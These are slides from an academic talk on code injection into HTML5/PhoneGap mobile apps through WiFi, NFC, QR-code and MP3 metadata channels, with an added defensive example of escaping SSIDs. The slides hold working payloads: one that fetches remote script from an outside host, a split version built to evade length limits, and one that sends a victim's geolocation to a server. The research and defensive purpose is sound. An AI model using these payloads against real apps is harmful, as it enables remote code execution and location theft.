Code Injection Attacks on HTML5-based Mobile Apps


1 Code Injection Attacks on HTML5-based Mobile Apps
Xing Jin, Tongbo Luo, Derek G. Tsui, Wenliang Du
Department of Electrical Engineering & Computer Science, Syracuse University


3 Outline
- Background
  - Overview of HTML5-based Mobile App
  - Overview of PhoneGap Architecture
  - Risks in JavaScript
- Code Injection Attacks on HTML5-based mobile apps
  - Overview of the Attack
  - Channels of the Attack
  - Examples (WiFi, NFC, MP3)
  - Length limitation
  - Real Vulnerable Cases
- Future Work

4 Overview of HTML5-based Mobile App
[Diagram labels: PhoneGap; WebView (HTML, CSS, JavaScript); addJavascriptInterface(); Device (Accelerometer, Camera, Compass, Contacts, File, Geolocation, Notification)]
Advantage: Can be easily ported between different platforms

5 Overview of PhoneGap Architecture

6 Risks in JavaScript
Data and code can be mixed together.
  var text="Hello!<script>alert('hello')</script>";
  document.write(text);
Once it runs, the data will be displayed, and the JavaScript code will also be executed.

7 Overview of the Attack

8 Overview of the Attack

9 Channels of XDS Attack
- ID Channels (WiFi, Bluetooth)
- Data Channels Unique to Mobile Devices (NFC, Barcode, SMS)
- Metadata Channels (MP3, MP4, Image)

We group the channels identified in this paper into three categories. The first is the ID channels: code can be embedded into identities such as the WiFi SSID or the Bluetooth name. The second is data channels unique to mobile devices, including NFC, barcode and SMS. The third is the metadata channels: media files such as MP3, MP4 and images use metadata to describe details of the file, including artist, album and model, and we can also successfully inject code into these metadata fields. Next I will pick one example in each category to show how the attack works.

10 Example 1(WiFi) Non PhoneGap WiFi-Finder PhoneGap WiFi-Finder

11 Example 2(NFC) Non PhoneGap NFC App PhoneGap NFC App

12 Example 3(mp3) Non PhoneGap Mp3 App PhoneGap Mp3 App

13 Length Limitation of Channels

14 Overcome the limitation
Use External JS files:
  <script src=//mu.gl></script> (will be filtered out by innerHTML)
Split JS code into pieces:
  <img src onerror=$.getScript('http://mu.gl')> (need to use jQuery)
  1 <img src onerror=a="$.getScr">
  2 <img src onerror=b="ipt('ht">
  3 <img src onerror=c="tp://mu.">
  4 <img src onerror=d="gl')">
  5 <img src onerror=eval(a+b+c+d)>

15 Real vulnerable cases
Downloaded 764 PhoneGap apps from Google Play
Found several vulnerable apps that satisfy two attack conditions:
- read external data from the channels that we have identified
- use vulnerable APIs or attributes to display information from the channels
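
The second condition above, shown for the WiFi SSID channel as an added example (not from the slides or the authors' code): the same scan results turned into markup by string concatenation and with output encoding. The function names and the sample SSIDs are constructed for illustration.

```javascript
// Added example: rendering untrusted channel data (here, WiFi SSIDs) for a WebView page.
// All names and sample values are constructed for illustration.

// Encode the characters that let a string leave a text or attribute context in HTML.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the SSID is concatenated into markup, so once this string
// reaches innerHTML or document.write the parser treats SSID bytes as tags.
function renderNetworksUnsafe(ssids) {
  return '<ul>' + ssids.map((s) => '<li>' + s + '</li>').join('') + '</ul>';
}

// Hardened pattern: every SSID is encoded as text before it is placed in markup.
function renderNetworksSafe(ssids) {
  return '<ul>' + ssids.map((s) => '<li>' + escapeHtml(s) + '</li>').join('') + '</ul>';
}

// List the tags a parser would see other than the list markup the app itself emits.
function unexpectedTags(html) {
  const tags = html.match(/<\/?[a-zA-Z][^>]*>/g) || [];
  return tags.filter((t) => !/^<\/?(ul|li)>$/.test(t));
}

// Constructed scan results: one ordinary SSID and one that carries markup.
const scanResults = ['CoffeeShop-Guest', "<img src onerror=alert('hello')>"];

console.log('unsafe:', unexpectedTags(renderNetworksUnsafe(scanResults)));
console.log('safe:  ', unexpectedTags(renderNetworksSafe(scanResults)));
```

Inside the WebView, assigning the value through textContent (or jQuery's .text()) instead of innerHTML or .html() has the same effect without manual escaping.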

16 Real Vulnerable Cases Information sent to Server Non PhoneGap App

17 Real vulnerable Cases
The code injected in the QR code:
  <img src=x onerror=
    navigator.geolocation.watchPosition(
      function(loc){
        m='Latitude:'+loc.coords.latitude+
          '\n'+'Longitude:'+loc.coords.longitude;
        alert(m);
        b=document.createElement('img');
        b.src='http:// :5556?c='+m
      })>

18 Future Work
- Large Scale analysis of HTML5-based mobile apps
- Solution to address the attack

19 Thanks! Q & A

